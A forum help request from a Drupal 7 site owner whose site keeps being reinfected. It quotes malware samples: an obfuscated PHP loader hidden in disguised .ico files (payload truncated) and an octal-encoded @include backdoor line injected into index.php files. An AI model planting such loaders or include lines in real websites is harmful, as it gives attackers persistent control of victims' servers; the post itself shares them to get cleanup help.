Clean up hacked site

Hi,

Sorry if this is incorrect forum - please help me where it should be moved to in that case.

My drupal 7 site has been recently compromised - I guess due to unpatched critical issue (I had two minor versions oldere than latest) but I can't make it clean again.
 

What's happening:

From time to time (probably triggered by access some page) site gets into the internal error wher root URL show something like (sorry - I forgot to record that this time) "PHP errror, expected ) but , found in .... there is some path to .ico file"

That ico file contains just some PHP code. and is located on different places, usually it has name like .fsdr4ef.ico and is located at random places places like modues/file

Example content:

<?php
$_r32j4c = basename/*pk*/(/*vz8rq*/trim/*mvo0*/(/*v*/preg_replace/*m6yf*/(/*qp*/rawurldecode/*s8*/(/*13rz*/"%2F%5C%28.%2A%24%2F"/*es*/)/*ctyo*/, '', __FILE__/*st8j1*/)/*htzf3*//*p6i25*/)/*k1vd*//*k5*/)/*dh0*/;$_6famu = "G%00%17K%12%07%03S%0A%40%0C%07G%09%15C%11V%02%0Bj%00A%07%17%0AV%12h%00A%06%07A%06%0ENJF%24%1D%3D%07V%05%0F%5B%06%06N%10%1B%5C%03V%0El%00%09%5B%17K%11%170M%14R%02G%06F%12O%0EXJT%24l%17GY%0E%16D%10%0ETCV%1EQ%00X%13%05%13%5B%00Z%00%0C%01%0E%14F%04C%06%0DEK%0A%13%0B%1FG%10%1BC%17%0C%0AA%14%40%1D%0C%1EZOLG%40%04%0C%5E%0E%5D%08CR%0EA%10X%13%05%09GK%0A%00%5E_%15F%13%0A%13_FF%17%5C%05%06%01%06BM%0BC%0A%10%1CX%0EM%0AD%05OLG%40%04%0C%5E%0E%5D%08CA%13F%5E%10%40%06%12%1DGA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%1ACY%15GA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%13YF%11%19F%19%0A%19uB%5E%3E%08%1El%11%1BO%18%05%05M%09U%0E%0EA%14T%14%5B%1B%0FM%0EH%17AW%06%05Z%07KKX%1DK%12B%11%5DCBM%02_%0F%09%0CA%04ZK%17%10%01_%08C%1A%02F%15%1B%3DGR%14%13%40%1BX%1E%0A%16%5BF%0AC%14FRgF%1A_F%5B%7CC%03U%16%06R%02%20%196%02%2A_C%609%1646p%0AG%28%0A0%60%27uFd3Cb%1A%0B%3EWVA%3FnFd%15C%40%29%0B%5D1J%1AP%12%06%07DH%3FD%19%2AT0O%23FFd9Cb3%60%2

and it's much longer.

This ico include is being called by randomly generated index.php files placed also within different dirs (and code is also in main index.php in root folder)

<?php

/*55b79*/

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

/*55b79*/

What I did so far:

1. I changed my FTP password
2. Deleted everything by sites/ folde
3. Uploaded a lates Drupal 7 version
4. Searched and deleted all index.php files and suspicious .ico files
5. Changed Drupal admin password
6. Updated all modules and removed unsused ones

All seemed to be working fine but after few days the same issue - I really don't know how it can be happening? I searched even within the all .php file to find out where those index.php can be created or so but haven't found anything.

Thanks for any help.

TC